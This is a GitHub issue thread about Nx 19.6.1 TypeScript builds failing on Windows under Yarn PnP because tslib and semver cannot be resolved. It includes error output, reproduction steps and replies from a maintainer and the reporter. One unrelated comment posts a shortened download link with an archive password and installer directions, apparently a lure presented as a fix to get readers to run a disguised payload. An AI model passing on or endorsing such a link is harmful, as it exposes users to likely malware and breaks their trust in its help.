### ISSUE TITLE
@nx/js:tsc build fails on Windows with Yarn PnP after 19.6.1

### ISSUE THREAD

**Issue by fpaul-1A** [nrwl/nx#27656]
### Current Behavior

Typescript compilation fails when migrating from nx 19.6.0 to 19.6.1 on Windows with Yarn PnP
```
 NX   Running target build for project mylib

   ×  nx run mylib:build
      Compiling TypeScript files for project "mylib"...
      /git_clones/test-nx-pnp-windows/packages/mylib/src/index.ts:1:1 - error TS2354: This syntax requires an imported helper but module 'tslib' cannot be found.

      1 export * from './lib/mylib';
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      /git_clones/test-nx-pnp-windows/packages/mylib/src/lib/mylib.ts:1:25 - error TS2307: Cannot find module 'semver' or its corresponding type declarations.

      1 import * as semver from 'semver';
```

### Expected Behavior

The build should be successful as on 19.6.0

### GitHub Repo

https://github.com/fpaul-1A/test-nx-pnp-windows/tree/19.6.1

### Steps to Reproduce

1. git clone https://github.com/fpaul-1A/test-nx-pnp-windows/tree/19.6.1
2. yarn install
3. yarn build

### Nx Report

```shell
NX   Report complete - copy this into the issue template

Node           : 20.14.0
OS             : win32-x64
Native Target  : x86_64-windows
yarn           : 4.4.1

nx          : 19.6.1
@nx/js      : 19.6.1
typescript  : 5.5.4
```

### Operating System

- [ ] macOS
- [ ] Linux
- [X] Windows
- [ ] Other (Please specify)

### Additional Information

The issue doesn't appear with `nodeLinker: node-modules`.
Also, it seems to be somehow related to this modification https://github.com/nrwl/nx/pull/27300, the build succeeds when reverting the change on `tsc.impl.ts`

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by jaysoo** [comment]
It looks like `tslib` is not installed in your workspace, but `importHelpers` is `true` in tsconfig. Can you install it and check if the build succeeds?

**Comment by fpaul-1A** [comment]
It looks like `tslib` is not installed in your workspace, but `importHelpers` is `true` in tsconfig. Can you install it and check if the build succeeds?

Hello, thanks for the reply
`tslib` is present in the `dependencies` of the project `mylib`
Adding it at the root of the workspace doesn't seem to fix the problem :(

This is working as expected either on 19.6.0 or in 19.6.1 without PnP without adding the dependency at root level

I also tried with 19.8.2 and still experience the same error.
